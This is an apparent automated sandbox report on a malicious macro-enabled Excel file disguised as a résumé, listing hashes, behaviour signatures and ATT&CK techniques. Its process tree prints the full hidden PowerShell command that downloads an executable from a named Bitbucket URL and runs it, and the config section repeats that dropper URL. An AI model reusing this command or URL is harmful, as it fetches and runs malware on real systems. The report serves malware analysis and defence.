Analysis

  • max time kernel
    71s
  • max time network
    22s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    24-12-2020 09:31

General

  • Target

    Curriculo Laura Sperandio (ps).xlsm

  • Size

    23KB

  • MD5

    dbad290342a0f6cd2554a4d7b06ff400

  • SHA1

    ea9e6a18734a7a389eaa66eace35c84ede9152c3

  • SHA256

    cf0f7d178b74a724d306e95469e7e3a8a8974c69a659a365ab8f1c129a69ec10

  • SHA512

    a26c41a262c375fce4369b51ee19283504e7aeed975416551f193b00313a083a26a034e69bcff59b6719b006e0dfb0ec4fb295ba6426a12a5d901c5c1810dc63

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://bitbucket.org/seveca-emilia/onemoreslave/downloads/sz.exe

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Curriculo Laura Sperandio (ps).xlsm"
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1744
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe /W hidden /C $TempDir = [System.IO.Path]::GetTempPath();cd $TempDir;(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/seveca-emilia/onemoreslave/downloads/sz.exe',$TempDir+'test.exe');Start-Process 'test.exe'
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2000

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

1
T1012

System Information Discovery

1
T1082

Command and Control

Web Service

1
T1102

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2000-2-0x0000000000000000-mapping.dmp
  • memory/2000-3-0x000000006B9F0000-0x000000006C0DE000-memory.dmp
    Filesize

    6.9MB

  • memory/2000-4-0x00000000023B0000-0x00000000023B1000-memory.dmp
    Filesize

    4KB

  • memory/2000-5-0x0000000004740000-0x0000000004741000-memory.dmp
    Filesize

    4KB

  • memory/2000-6-0x00000000025E0000-0x00000000025E1000-memory.dmp
    Filesize

    4KB

  • memory/2000-7-0x0000000005240000-0x0000000005241000-memory.dmp
    Filesize

    4KB

  • memory/2000-10-0x00000000057D0000-0x00000000057D1000-memory.dmp
    Filesize

    4KB

  • memory/2000-15-0x0000000005920000-0x0000000005921000-memory.dmp
    Filesize

    4KB

  • memory/2000-16-0x00000000064A0000-0x00000000064A1000-memory.dmp
    Filesize

    4KB

  • memory/2000-23-0x0000000006430000-0x0000000006431000-memory.dmp
    Filesize

    4KB

  • memory/2000-24-0x0000000006530000-0x0000000006531000-memory.dmp
    Filesize

    4KB

  • memory/2000-25-0x00000000067B0000-0x00000000067B1000-memory.dmp
    Filesize

    4KB

  • memory/2000-39-0x0000000006BA0000-0x0000000006BA1000-memory.dmp
    Filesize

    4KB

  • memory/2000-40-0x0000000006BB0000-0x0000000006BB1000-memory.dmp
    Filesize

    4KB